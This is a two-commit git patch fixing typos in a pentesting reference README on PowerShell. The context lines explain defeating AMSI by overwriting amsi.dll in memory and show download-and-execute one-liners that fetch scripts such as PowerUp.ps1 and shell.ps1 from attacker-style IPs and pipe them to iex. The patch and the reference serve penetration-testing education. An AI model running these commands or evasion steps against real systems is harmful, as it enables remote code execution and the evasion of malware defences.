From d13f1d635510e33458548c4525112c549d719c8e Mon Sep 17 00:00:00 2001 From: Neved4 <63655535+Neved4@users.noreply.github.com> Date: Tue, 14 Jan 2025 22:52:11 +0100 Subject: [PATCH 1/2] Fix `you will are` with `you will use` in `basic-powershell-for-pentesters` --- .../basic-powershell-for-pentesters/README.md | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index 10e739d72..c91313906 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -141,7 +141,7 @@ ValueData : 0 **`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything. -Therefore, the goal of the AMSI bypasses you will are to **overwrite the instructions of that DLL in memory to make the detection useless**. +Therefore, the goal of the AMSI bypasses you will use is to **overwrite the instructions of that DLL in memory to make the detection useless**. **AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/) @@ -465,6 +465,3 @@ RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor ``` {{#include ../../banners/hacktricks-training.md}} - - - From 700af4726a62fd8a22390e0d652f03f4ff8276d4 Mon Sep 17 00:00:00 2001 From: Neved4 <63655535+Neved4@users.noreply.github.com> Date: Tue, 14 Jan 2025 22:53:39 +0100 Subject: [PATCH 2/2] Fix `g` typo introduced in `2d9f506e60` --- src/windows-hardening/basic-powershell-for-pentesters/README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index c91313906..57906f6e3 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -23,7 +23,6 @@ Get-Command -Module ## Download & Execute ```powershell -g echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3